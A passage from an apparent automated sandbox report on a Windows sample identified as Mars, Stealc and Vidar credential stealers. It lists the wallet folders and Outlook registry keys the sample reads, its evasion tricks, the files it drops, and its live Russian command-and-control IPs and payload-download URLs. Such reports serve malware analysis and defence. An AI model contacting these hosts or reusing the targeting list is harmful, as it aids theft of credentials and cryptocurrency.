Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467934 Sample: file.exe Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 54 16 other signatures 2->54 8 file.exe 36 2->8         started        13 explorti.exe 12 2->13         started        15 explorti.exe 2->15         started        process3 dnsIp4 42 85.28.47.30, 49730, 80 GES-ASRU Russian Federation 8->42 44 77.91.77.81, 49731, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->44 34 C:\Users\user\AppData\...\JJEGIJEGDB.exe, PE32 8->34 dropped 36 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->36 dropped 38 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->38 dropped 40 11 other files (7 malicious) 8->40 dropped 64 Detected unpacking (changes PE section rights) 8->64 66 Tries to steal Mail credentials (via file / registry access) 8->66 68 Found many strings related to Crypto-Wallets (likely being stolen) 8->68 76 4 other signatures 8->76 17 cmd.exe 1 8->17         started        19 cmd.exe 2 8->19         started        46 77.91.77.82, 49744, 49745, 49746 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 13->46 70 Hides threads from debuggers 13->70 72 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->72 74 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->74 file5 signatures6 process7 process8 21 JJEGIJEGDB.exe 4 17->21         started        25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        file9 32 C:\Users\user\AppData\Local\...\explorti.exe, PE32 21->32 dropped 56 Antivirus detection for dropped file 21->56 58 Multi AV Scanner detection for dropped file 21->58 60 Detected unpacking (changes PE section rights) 21->60 62 6 other signatures 21->62 29 explorti.exe 21->29         started        signatures10 process11 signatures12 78 Antivirus detection for dropped file 29->78 80 Multi AV Scanner detection for dropped file 29->80 82 Detected unpacking (changes PE section rights) 29->82 84 7 other signatures 29->84
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.28.47.30
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU false
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe false
  • 27%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.30/69934896f997d5bb/softokn3.dll true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/freebl3.dll true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • 24%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.30/69934896f997d5bb/nss3.dll true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/sqlite3.dll true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/vcruntime140.dll true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
85.28.47.30/920475a59bac849d.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/920475a59bac849d.php true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/msvcp140.dll true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/mozglue.dll true
  • Avira URL Cloud: malware
 unknown